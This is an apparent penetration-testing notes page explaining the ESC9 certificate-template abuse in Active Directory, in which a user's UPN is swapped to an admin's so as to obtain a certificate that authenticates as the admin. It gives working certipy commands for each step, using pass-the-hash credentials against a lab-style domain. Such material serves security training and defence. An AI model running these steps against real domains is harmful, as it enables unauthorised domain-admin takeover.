ESC9

ABOUT

ESC9 allows a user with GenericWrite (or equivalent control) over another domain user to impersonate any user (e.g., Domain Admin) by abusing a vulnerable certificate template that does not enforce UPN/SAN validation. The attacker temporarily changes the controlled user's UPN to the victim's (e.g., administrator), requests a certificate, and then reverts the UPN. The issued certificate allows authentication as the victim.

FLOW

We need 2 users: User 1 who has GenericWrite, GenericAll, or WriteProperty over User2

Then we change the UPN of User2 to User3 (user who we want to impersonate, admin),
Requesting certificate for User2 and tricking CA because of absent validation.
Then we revert back the UPN.
And authenticate with certificate.

EXPLOITATION

Temporarily set user2’s UPN to admin

certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn admin

Request certificate as user2 (with UPN = admin)

certipy req -username "user2@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -target ca.militech.local -ca militech-DC01-CA -template CertifiedAuthentication

Revert user2’s UPN back to original

certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn "user2@militech.local"

Authenticate with the certificate as admin

certipy auth -pfx admin.pfx -domain militech.local -target 13.13.13.13

RESOURCES

06 ‐ Privilege EscalationGitHub

PreviousESC1 NextESC15

Last updated 5 months ago

hashtagABOUT

hashtagFLOW

hashtagEXPLOITATION

hashtagTemporarily set user2’s UPN to admin

hashtagRequest certificate as user2 (with UPN = admin)

hashtagRevert user2’s UPN back to original

hashtagAuthenticate with the certificate as admin

hashtagRESOURCES